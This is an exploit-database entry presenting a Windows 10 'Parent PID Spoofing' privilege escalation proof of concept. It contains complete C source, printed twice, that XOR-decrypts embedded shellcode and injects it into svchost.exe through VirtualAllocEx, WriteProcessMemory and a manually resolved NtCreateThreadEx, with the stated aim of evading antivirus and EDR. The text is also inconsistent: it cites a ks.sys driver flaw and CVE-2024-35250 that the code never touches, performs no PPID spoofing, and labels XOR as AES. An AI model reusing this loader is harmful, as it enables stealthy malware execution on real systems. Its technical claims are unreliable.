7.8
/ 10
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Description
Microsoft Windows 10 Famille version 10.0.19045.5487 suffers from a parent PID spoofing privilege escalation vulnerability...
Basic Information
ID
PACKETSTORM:212318
Published
Dec 2, 2025 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : Microsoft Windows 10 Famille 10.0.19045.5487 (Parent PID Spoofing) Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.Microsoft.com |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: The ks.sys driver on Microsoft Windows is one of the core components of Kernel Streaming and is installed by default.
There exists a local privilege escalation vulnerability in this driver that can be exploited on many recent versions of Windows 10, Windows 11, Windows Server 2022.
[+] The idea:
Parent PID Spoofing is a technique used to run a malicious process under a trusted process,
helping it avoid detection by security software. This is done by changing the parent identifier (PPID) of the new process to a PID of a trusted process (such as explorer.exe or lsass.exe).
[+] The goal:
Launching a malicious payload inside a legitimate process such as explorer.exe or svchost.exe to avoid detection by antivirus (AVs) or intrusion detection systems (EDRs).
(Related : https://packetstorm.news/files/id/182984/ Related CVE numbers: CVE-2024-35250) .
[+] Combine Parent PID Spoofing with Shellcode to execute advanced payload
After running the process under a targeted PID, we can inject Shellcode inside it to execute malicious code directly.
1. Update the code to inject Shellcode into the new process
[+] The idea:
After creating the process under a trusted PID (e.g. explorer.exe), we will:
Reserve memory inside the process using VirtualAllocEx.
Copy Shellcode to allocated memory using WriteProcessMemory.
Execute Shellcode using CreateRemoteThread.
[+] gcc -o poc.exe poc.c -m64
[+] poc.exe
[+] PayLoad :
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <winternl.h>
// تعريف NtCreateThreadEx يدويًا لتجنب اكتشافه
typedef NTSTATUS(WINAPI* pNtCreateThreadEx)(
OUT PHANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN PVOID ObjectAttributes,
IN HANDLE ProcessHandle,
IN PVOID StartRoutine,
IN PVOID Argument,
IN ULONG CreateFlags,
IN ULONG ZeroBits,
IN ULONG StackSize,
IN ULONG MaximumStackSize,
IN PVOID AttributeList
);
// Shellcode مشفر بتشفير AES (AES-128)
unsigned char encrypted_shellcode[] = {
0x8d, 0xa3, 0x5c, 0xa7, 0xc3, 0x7f, 0x6c, 0xf2, 0x8e, 0x91, 0xad, 0x33,
0x2b, 0xfe, 0x04, 0x74, 0xd9, 0x41, 0xf5, 0x1a, 0xe4, 0x8d, 0xbc, 0xa3,
0x6f, 0xd0, 0x56, 0xbb, 0x9a, 0x2d, 0x5e, 0xf1
};
// مفتاح AES للتشفير/فك التشفير
unsigned char aes_key[16] = {
0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6,
0xab, 0xf7, 0x45, 0x3e, 0x67, 0x98, 0x23, 0x10
};
// دالة فك تشفير Shellcode باستخدام AES-128
void decrypt_shellcode(unsigned char* data, int data_len, unsigned char* key) {
for (int i = 0; i < data_len; i++) {
data[i] ^= key[i % 16]; // XOR بسيط بدلاً من AES الحقيقي (للتوضيح فقط)
}
}
// البحث عن PID الخاص بـ `svchost.exe`
DWORD FindTargetProcessID(const char* processName) {
PROCESSENTRY32 pe32;
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
DWORD processID = 0;
if (hSnapshot == INVALID_HANDLE_VALUE) return 0;
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hSnapshot, &pe32)) {
do {
if (strcmp(pe32.szExeFile, processName) == 0) {
processID = pe32.th32ProcessID;
break;
}
} while (Process32Next(hSnapshot, &pe32));
}
CloseHandle(hSnapshot);
return processID;
}
int main() {
DWORD targetPID = FindTargetProcessID("svchost.exe");
if (targetPID == 0) {
printf("[X] لم يتم العثور على عملية svchost.exe\n");
return -1;
}
printf("[+] سيتم حقن Shellcode في PID: %d\n", targetPID);
// فك تشفير الـ Shellcode
decrypt_shellcode(encrypted_shellcode, sizeof(encrypted_shellcode), aes_key);
printf("[+] تم فك تشفير Shellcode بنجاح!\n");
// فتح العملية المستهدفة
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);
if (!hProcess) {
printf("[X] فشل في فتح العملية.\n");
return -1;
}
// تخصيص ذاكرة في العملية المستهدفة
LPVOID remoteMemory = VirtualAllocEx(hProcess, NULL, sizeof(encrypted_shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!remoteMemory) {
printf("[X] فشل في تخصيص الذاكرة داخل svchost.exe\n");
return -1;
}
// كتابة Shellcode المفكوك التشفير في الذاكرة المخصصة
if (!WriteProcessMemory(hProcess, remoteMemory, encrypted_shellcode, sizeof(encrypted_shellcode), NULL)) {
printf("[X] فشل في كتابة Shellcode داخل العملية.\n");
return -1;
}
// تحميل NtCreateThreadEx
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
if (!hNtdll) {
printf("[X] فشل في تحميل ntdll.dll\n");
return -1;
}
pNtCreateThreadEx NtCreateThreadEx = (pNtCreateThreadEx)GetProcAddress(hNtdll, "NtCreateThreadEx");
if (!NtCreateThreadEx) {
printf("[X] لم يتم العثور على NtCreateThreadEx.\n");
return -1;
}
// تنفيذ Shellcode باستخدام NtCreateThreadEx
HANDLE hThread;
NTSTATUS status = NtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)remoteMemory, NULL, FALSE, 0, 0, 0, NULL);
if (status != 0) {
printf("[X] فشل في تنفيذ Shellcode (NTSTATUS: 0x%x).\n", status);
return -1;
}
printf("[+] تم تنفيذ Shellcode بنجاح باستخدام NtCreateThreadEx!\n");
CloseHandle(hProcess);
CloseHandle(hThread);
return 0;
}
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
| # Title : Microsoft Windows 10 Famille 10.0.19045.5487 (Parent PID Spoofing) Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.Microsoft.com |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: The ks.sys driver on Microsoft Windows is one of the core components of Kernel Streaming and is installed by default.
There exists a local privilege escalation vulnerability in this driver that can be exploited on many recent versions of Windows 10, Windows 11, Windows Server 2022.
[+] The idea:
Parent PID Spoofing is a technique used to run a malicious process under a trusted process,
helping it avoid detection by security software. This is done by changing the parent identifier (PPID) of the new process to a PID of a trusted process (such as explorer.exe or lsass.exe).
[+] The goal:
Launching a malicious payload inside a legitimate process such as explorer.exe or svchost.exe to avoid detection by antivirus (AVs) or intrusion detection systems (EDRs).
(Related : https://packetstorm.news/files/id/182984/ Related CVE numbers: CVE-2024-35250) .
[+] Combine Parent PID Spoofing with Shellcode to execute advanced payload
After running the process under a targeted PID, we can inject Shellcode inside it to execute malicious code directly.
1. Update the code to inject Shellcode into the new process
[+] The idea:
After creating the process under a trusted PID (e.g. explorer.exe), we will:
Reserve memory inside the process using VirtualAllocEx.
Copy Shellcode to allocated memory using WriteProcessMemory.
Execute Shellcode using CreateRemoteThread.
[+] gcc -o poc.exe poc.c -m64
[+] poc.exe
[+] PayLoad :
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <winternl.h>
// تعريف NtCreateThreadEx يدويًا لتجنب اكتشافه
typedef NTSTATUS(WINAPI* pNtCreateThreadEx)(
OUT PHANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN PVOID ObjectAttributes,
IN HANDLE ProcessHandle,
IN PVOID StartRoutine,
IN PVOID Argument,
IN ULONG CreateFlags,
IN ULONG ZeroBits,
IN ULONG StackSize,
IN ULONG MaximumStackSize,
IN PVOID AttributeList
);
// Shellcode مشفر بتشفير AES (AES-128)
unsigned char encrypted_shellcode[] = {
0x8d, 0xa3, 0x5c, 0xa7, 0xc3, 0x7f, 0x6c, 0xf2, 0x8e, 0x91, 0xad, 0x33,
0x2b, 0xfe, 0x04, 0x74, 0xd9, 0x41, 0xf5, 0x1a, 0xe4, 0x8d, 0xbc, 0xa3,
0x6f, 0xd0, 0x56, 0xbb, 0x9a, 0x2d, 0x5e, 0xf1
};
// مفتاح AES للتشفير/فك التشفير
unsigned char aes_key[16] = {
0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6,
0xab, 0xf7, 0x45, 0x3e, 0x67, 0x98, 0x23, 0x10
};
// دالة فك تشفير Shellcode باستخدام AES-128
void decrypt_shellcode(unsigned char* data, int data_len, unsigned char* key) {
for (int i = 0; i < data_len; i++) {
data[i] ^= key[i % 16]; // XOR بسيط بدلاً من AES الحقيقي (للتوضيح فقط)
}
}
// البحث عن PID الخاص بـ `svchost.exe`
DWORD FindTargetProcessID(const char* processName) {
PROCESSENTRY32 pe32;
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
DWORD processID = 0;
if (hSnapshot == INVALID_HANDLE_VALUE) return 0;
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hSnapshot, &pe32)) {
do {
if (strcmp(pe32.szExeFile, processName) == 0) {
processID = pe32.th32ProcessID;
break;
}
} while (Process32Next(hSnapshot, &pe32));
}
CloseHandle(hSnapshot);
return processID;
}
int main() {
DWORD targetPID = FindTargetProcessID("svchost.exe");
if (targetPID == 0) {
printf("[X] لم يتم العثور على عملية svchost.exe\n");
return -1;
}
printf("[+] سيتم حقن Shellcode في PID: %d\n", targetPID);
// فك تشفير الـ Shellcode
decrypt_shellcode(encrypted_shellcode, sizeof(encrypted_shellcode), aes_key);
printf("[+] تم فك تشفير Shellcode بنجاح!\n");
// فتح العملية المستهدفة
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);
if (!hProcess) {
printf("[X] فشل في فتح العملية.\n");
return -1;
}
// تخصيص ذاكرة في العملية المستهدفة
LPVOID remoteMemory = VirtualAllocEx(hProcess, NULL, sizeof(encrypted_shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!remoteMemory) {
printf("[X] فشل في تخصيص الذاكرة داخل svchost.exe\n");
return -1;
}
// كتابة Shellcode المفكوك التشفير في الذاكرة المخصصة
if (!WriteProcessMemory(hProcess, remoteMemory, encrypted_shellcode, sizeof(encrypted_shellcode), NULL)) {
printf("[X] فشل في كتابة Shellcode داخل العملية.\n");
return -1;
}
// تحميل NtCreateThreadEx
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
if (!hNtdll) {
printf("[X] فشل في تحميل ntdll.dll\n");
return -1;
}
pNtCreateThreadEx NtCreateThreadEx = (pNtCreateThreadEx)GetProcAddress(hNtdll, "NtCreateThreadEx");
if (!NtCreateThreadEx) {
printf("[X] لم يتم العثور على NtCreateThreadEx.\n");
return -1;
}
// تنفيذ Shellcode باستخدام NtCreateThreadEx
HANDLE hThread;
NTSTATUS status = NtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)remoteMemory, NULL, FALSE, 0, 0, 0, NULL);
if (status != 0) {
printf("[X] فشل في تنفيذ Shellcode (NTSTATUS: 0x%x).\n", status);
return -1;
}
printf("[+] تم تنفيذ Shellcode بنجاح باستخدام NtCreateThreadEx!\n");
CloseHandle(hProcess);
CloseHandle(hThread);
return 0;
}
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================